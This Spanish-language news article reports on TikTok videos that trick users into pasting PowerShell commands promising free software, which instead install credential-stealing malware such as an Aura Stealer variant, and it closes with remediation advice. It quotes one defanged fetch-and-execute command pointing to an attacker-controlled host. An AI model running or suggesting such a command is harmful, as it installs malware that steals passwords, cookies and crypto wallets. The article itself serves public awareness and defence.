Una nueva ola de ciberestafas ha comenzado a propagarse en TikTok, lo que pone en entredicho la seguridad digital de miles de usuarios de la plataforma. Los ciberdelincuentes han perfeccionado sus métodos, mezclando tutoriales falsos con ingeniería social para engañar, distribuir malware y acceder a datos personales valiosos, incluyendo contraseñas y credenciales bancarias.

El fraude se basa en la popularidad de los videos cortos que prometen soluciones rápidas. Bajo la apariencia de consejos simples que ofrecen accesos gratuitos a programas como Windows, Photoshop, Netflix y otros servicios en línea, los atacantes producen videos donde explican cómo ejecutar supuestos comandos “secretos” en PowerShell, la terminal de Windows.

Estos comandos, que parecen inofensivos y técnicos, suelen copiarse con la confianza que genera el formato dinámico de TikTok. Sin embargo, su verdadero objetivo es descargar y ejecutar malware de forma remota en el dispositivo del usuario.

Uno de los ejemplos más frecuentes consiste en indicar el uso de un comando como “iex (irm slmgr[.]win/photoshop)”. Este texto, lejos de proporcionar acceso gratuito a programas, conecta el sistema del usuario con un servidor controlado por los atacantes. Así, scripts maliciosos se descargan y ejecutan sin que la víctima lo note, permitiendo a los ciberdelincuentes tomar el control del equipo o acceder a información sensible.

De acuerdo con Xavier Mertens, investigador del SANS Internet Storm Center (ISC), al ejecutar estos comandos el sistema puede llegar a instalar dos tipos de archivos ejecutables maliciosos.

El primero, identificado como una variante del conocido Aura Stealer, se especializa en el robo de credenciales. Este malware busca contraseñas almacenadas en navegadores web, cookies de autenticación e incluso información relacionada con billeteras de criptomonedas.

Su capacidad para recolectar datos de acceso a distintos servicios multiplica el riesgo para las víctimas, que ven comprometidas no solo sus redes sociales, también sus plataformas bancarias y cuentas de correo electrónico.

El segundo archivo ejecutable detectado posee una funcionalidad avanzada, pues puede compilar código de manera dinámica. Este comportamiento permite a los atacantes adaptar su estrategia dependiendo de las características del dispositivo o del perfil digital de la víctima.

Aunque aún no se ha identificado el propósito exacto de este componente, se especula que podría usarse tanto para ampliar el ataque como para establecer persistencia en el sistema afectado, dificultando su eliminación.

Videos que cambian el logo de una aplicación, habilitan “opciones secretas” o prometen versiones gratuitas de software de paga son caldo de cultivo para la propagación de amenazas en redes sociales, especialmente entre usuarios jóvenes o con conocimientos técnicos limitados.

Ante esta situación, los expertos recomiendan actuar con rapidez si se ha seguido alguno de estos tutoriales sospechosos. Lo primero es cambiar todas las contraseñas de servicios en línea, desde redes sociales hasta plataformas financieras. El uso de un gestor de contraseñas seguro puede facilitar la generación de claves únicas y complejas, un paso esencial tras un posible robo de credenciales.

El siguiente paso es ejecutar un análisis completo del sistema con software antivirus y antimalware actualizado. También se aconseja desconectar el dispositivo de redes empresariales o familiares en caso de notar comportamientos extraños, como procesos no identificados o accesos inusuales a cuentas en línea.

Los usuarios deben prestar especial atención a las configuraciones de inicio automático de Windows, buscando servicios o aplicaciones desconocidas que puedan haberse instalado sin autorización.

Por último, reportar los videos, comandos y cuentas responsables directamente a TikTok contribuye a frenar la difusión de estas campañas maliciosas. La empresa mantiene canales habilitados para denuncias de contenido sospechoso y realiza investigaciones para eliminar estas amenazas. La colaboración de la comunidad es vital para reducir el alcance de los ataques y advertir a otros usuarios sobre los riesgos.